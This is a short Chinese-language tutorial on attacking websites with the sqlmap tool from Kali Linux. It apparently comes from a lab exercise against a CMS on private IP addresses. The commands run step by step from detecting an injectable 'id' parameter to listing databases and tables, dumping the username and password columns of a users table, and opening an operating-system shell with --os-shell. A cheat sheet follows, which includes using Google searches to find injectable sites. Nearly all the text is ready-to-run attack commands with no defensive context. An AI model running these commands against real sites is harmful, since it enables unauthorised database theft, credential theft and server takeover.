sqlmap 攻击

sqlmap  是kali 里面的工具 

sqlmap对注入点注入 

1 如果是 get 注入,直接,sqlmap -u "注入点网址".

2  如果是 post 注入,可以 sqlmap –r "burp 地址访问包”

3 如果是 cookie,X-Forwarded-For 等,可以访问的时候,用 burpsuite 抓包,注入处用号替 换,放到文件里,然后 sqlmap -r "文件地址",记得加上—level 3 参数

写入getshell

sqlmap -u "http://192.168.16.119/show.php?id=33" --os-shell

实战 

注入点:  cms权限

注入点:http://10.9.75.140/cms/show.php?id=33

sqlmap -u "http://10.9.75.140/cms/show.php?id=33"

#检测注入点

sqlmap -u "http://10.9.75.140/cms/show.php?id=33" --dbs

#列出所有的库名

sqlmap -u "http://10.9.75.140/cms/show.php?id=33" --current-db

#当前数据库的名字

sqlmap -u "http://10.9.75.140/cms/show.php?id=33" -D "cms" --tables

#指定目标数据库为cms&列出数据库中所有的表名

sqlmap -u "http://10.9.75.140/cms/show.php?id=33" -D "cms" -T "cms_users" --columns

#指定目标数据库为cms&指定目标表名为'cms_users'&列出所有的字段名

sqlmap -u "http://10.9.75.140/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username,password" --dump

#指定目标数据库为cms&指定目标表名为'cms_users'&列出字段内容

 

更新 

sudo  apt-get update

sudo  apt-get install sqlmap 

重要参数 

u 检测注入点
–dbs 列出所有的库名
–current-user 当前连接数据库用户的名字
–current-db 当前数据库的名字
-D “cms” –tables 指定目标数据库为cms 列出数据库中所有的表名
-T “cms_users” 指定目标表名为’cms_users’
–columns -C ‘username,password’ 列出所有的字段名 指定目标字段
–dump -r 列出字段内容 从文件中读取HTTP 请求
–os-shell 在特定情况下,可以直接获得目标系统Shell
–level 3 设置sqlmap 检测等级 3
–cookie=”username=admin” 携带Cookie 信息进行注入
-g –batch 利用google 搜索引擎自动搜索注入点 使用默认选项
–random-agent 使用随机User-Agent 信息
-v 3 显示payload

你可能感兴趣的:(安全工具,java,前端,服务器)